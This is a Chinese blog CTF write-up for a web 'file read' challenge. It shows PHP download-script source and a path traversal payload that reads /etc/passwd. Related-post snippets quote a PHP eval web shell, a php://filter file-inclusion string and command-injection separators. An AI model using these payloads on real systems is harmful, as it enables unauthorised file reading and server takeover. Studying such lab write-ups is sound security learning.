云演-Web文件读取-writeup

最新推荐文章于 2022-05-22 00:37:04 发布
最新推荐文章于 2022-05-22 00:37:04 发布
阅读量406 收藏
点赞数
分类专栏: 云演
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45628145/article/details/106748731
版权

文件读取


题目主页面是一个下载附件的链接,然而附件里面什么都没有,通过构造

download.php?url=download.php

下载得到download.php

<?php
include_once ('download.class.php');
$filename = $_GET['url'];
$file = new Down();
$downfile = $file -> downfile($filename);
?>

感觉有点像一个反序列化题,下载download.class.php

download.php?url=download.class.php

<?php

class Down
{
	function downfile($file){

		//First, see if the file exists
//		if (!is_file($file)) { die("<b>404 File not found!</b>"); }

		//Gather relevent info about file
	//	$len = filesize($file);
		$filename = basename($file);
		$file_extension = strtolower(substr(strrchr($filename,"."),1));

		//This will set the Content-Type to the appropriate setting for the file
		switch( $file_extension ) {
			case "pdf": $ctype="application/pdf"; break;
		  	case "exe": $ctype="application/octet-stream"; break;
		  	case "zip": $ctype="application/zip"; break;
		  	case "doc": $ctype="application/msword"; break;
		  	case "xls": $ctype="application/vnd.ms-excel"; break;
		  	case "ppt": $ctype="application/vnd.ms-powerpoint"; break;
		  	case "gif": $ctype="image/gif"; break;
		  	case "png": $ctype="image/png"; break;
		  	case "jpeg":
		  	case "jpg": $ctype="image/jpg"; break;
		  	case "mp3": $ctype="audio/mpeg"; break;
		  	case "wav": $ctype="audio/x-wav"; break;
		  	case "mpeg":
		  	case "mpg":
		  	case "mpe": $ctype="video/mpeg"; break;
		  	case "mov": $ctype="video/quicktime"; break;
		  	case "avi": $ctype="video/x-msvideo"; break;

		  //The following are for extensions that shouldn't be downloaded (sensitive stuff, like php files)
		  //case "php":
		  //case "htm":
		  //case "html":
		  case "txt": die("<b>Cannot be used for ". $file_extension ." files!</b>"); break;

		//  default: $ctype="application/force-download";
		}

		//Begin writing headers
		/*header("Pragma: public");
		header("Expires: 0");
		header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
		header("Cache-Control: public"); 
		header("Content-Description: File Transfer");
		*/
		//Use the switch-generated Content-Type
		header("Content-Type: $ctype");

		//Force the download
		$header="Content-Disposition: attachment; filename=".$filename.";";
		header($header );
		//header("Content-Transfer-Encoding: binary");
	//	header("Content-Length: ".$len);
		@readfile($file);
		exit;
	}
}
?>

然并卵,没什么用,只是发现一个@readfile($file);,然后想着去读取一下/etc/passwd,一个一个路径的试,最后的payload为

download.php?url=../../../../../etc/passwd

得到flag

秋风瑟瑟...
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
云演-Web信息篇-writeup
qq_45628145的博客
06-14 1061
key在哪 f12 Forbidden 看源码发现一段ajax请求,里面有一个/asetxted/logiinffff1111aaaaggggggg.php 访问得到flag 运维失误 一个登陆框,题目是叫做运维失误,运维失误那就很大可能是源码泄露了,访问check.php.bak得到备份文件 文件里面有用户名和密码,登录得到flag JS 有一个check.js文件 function Check() { t = "118,97,114,32,77,121,80,97,115,115,32,61,
云演CTF--blog
weixin_56301399的博客
01-16 698
这道题我人麻了,看了半天愣是没思路,只好忍痛花费几块大洋看了解析:
云演CTF: 005.Blog
wanguixiu的博客
06-09 812
云演CTF: 005.Blog 作者: admin 时间: 2021-05-28 分类: 云演CTF 网站是个没有内容的博客,返回头表明了后端语言"Werkzeug/1.0.1 Python/2.7.6",尝试几个"www.zip,robots.txt"之类的路径没什么发现,然后各个标签点了点,发现了/div/目录,是这个样子的google一...
云演-Web文件上传-writeup
qq_45628145的博客
06-14 756
getshell 看到这个猜到是文件包含型文件上传题了,后续操作确实也是这样,上传一个图片马,包含一下getshell,不过<?和?>被过滤了 改成 <script language="php"></script> 绕过一下就好了 upload-01 说要传一个php木马,传一个php上去提示说只能传gif 加一个GIF文件头,抓包改一下MIME类型上传成功,得到flag GIF89a<?php @eval($_POST['a']);?> upl
云演 【ctf实验】
errorr0
01-21 1990
矛盾 <?php $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } ?> 正常给了一串代码,正常思维下会觉得有矛盾,矛盾点在于函数is_numeric()需要使num不为整形数字。但num==1,这是一个矛盾应该如何绕过就是需要探讨的。 首先,这是一个num与1的弱比较,而弱
2022-工大抗疫-web-writeup1
08-03
2022-工大抗疫-web-writeup1 本资源摘要信息聚焦于Web安全和网络协议相关知识点,涵盖了HTML、PHP、网络协议和Windows操作系统等多个方面。 一、网络协议 在Web开发中,网络协议扮演着重要角色。HTTP/1.1是目前最...
CTF-writeup
03-19
3. **文件I/O**:在某些挑战中,JavaScript可能被用来读取、写入或上传文件。了解如何在浏览器环境中限制和绕过这些限制是解决此类问题的关键。 4. **浏览器API滥用**:CTF中经常利用不常见的浏览器API进行攻击或...
2019.4 DDCTF web题--滴 writeup
04-14
这篇writeup涉及的是2019年4月的DDCTF(web)竞赛中的第一道题目——滴。这是一道关于Web安全和编码解码的挑战。让我们深入解析这个过程。 首先,URL `...
0RAYS-祥云杯writeup .pdf
09-05
总的来说,这个writeup提醒我们在开发过程中需要关注Web安全,尤其是在处理用户输入时要进行严格的验证和过滤,避免命令注入、源码泄露等安全问题。同时,也要注意错误处理和日志记录的安全性,确保系统能够抵御各种...
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1
08-03
此外,我们还看到了一些常见的JavaScript函数,如md5加密、readFile文件读取等。 在挑战题的核心逻辑中,我们可以看到一个名为render的函数,该函数用于将用户输入的数据进行处理,并将其显示在Web页面上。同时,...
云演CTF: 004.intval
wanguixiu的博客
06-09 1027
云演CTF: 004.intval 作者: admin 时间: 2021-05-27 分类: 云演CTF 进去直接给了代码<?php if(!isset($_GET['source'])){ highlight_file('index.php'); die(); } include('flag.php'); $key1 ...
云演CTF: 007.blog
wanguixiu的博客
06-09 921
云演CTF: 007.blog 作者: admin 时间: 2021-05-28 分类: 信息收集 打开就是登录界面,直接'123456',出现弹窗,还以为是js验证(想多了),CTRL+u打开源码$(function(){ var $login = $("#login"); $login.on( "click...
云演 CTF Web题型 lfi 文件包含
cadandme的博客
01-22 3014
文件包含 打开页面,典型的文件包含,文件包含的读取格式如下: ?file=php://filter/read=convert.base64-encode/resource=flag 读取到base64编码再解码,就得到 因为解码后还有url编码存在,谨慎起见,放到URL解码,得到真正的flag ...
云演CTF web题型 ping
cadandme的博客
01-19 1917
ping 打开页面提示用GET方式提交ip 尝试管道符分隔命令查看目录,没回显,被禁用 在这里我尝试了好久,忘记有哪些命令分隔符可以代替了,查找后才知道 Linux下一般的命令分隔符有这几个 | || & && . ; - <> $ %0a %0d ` 逐个尝试,%0a可以使用 到这一步,我们就可以看出flag就在fL4g_1s_He4r_______中了,直接查看,得到flag ...
云演ctf--可爱的emoji
qq_42820704的博客
03-30 5112
先吐槽一波:这道题最后一步着实坑 下载得文件: 用在线工具:Base100编码/解码 - 一个工具箱 - 好用的在线工具都在这里! 解码(一般的表情加密方式称'emoji加密'或'base100'), 得: GY2TIQJXG42EKNZZGRBTOMZUIU3DONBRGQYTIOJUGI2EKNBTGU3DIQJUHE3DIMZYG44DONJUGU3DOMZSG4ZDMOJUGI3DGNJYGY2DOMZTGMZEMNJYGU2TERRVGU3TCNZZGZATMNBUGI3
云演CTF:音频隐写
qq_50673174的博客
05-22 816
云演CTF音频隐写
云演-Web文件包含-writeup
qq_45628145的博客
06-15 422
phpmyadmin 页面里面有一个hint,提示flag在flag.txt里面,但是按照url里面的那种包含,也显示不了 发现源码里面有一个source.php <?php class pma { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; //白名
云演-Web文件下载-writeup
qq_45628145的博客
06-15 586
听首歌吧 页面里面有两个歌曲下载链接,发现下载的url是这样的 download.php?url=T25lIExvdmUubXAz 后面是对应文件名的base64编码,按照这个规律,下载一个download.php看看 download.php?url=ZG93bmxvYWQucGhw <?php error_reporting(0); include("hereiskey.php"); $url=base64_decode($_GET[url]); if( $url=="hereiskey.ph
云演CTF——php4fun
weixin_56301399的博客
01-16 3658
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值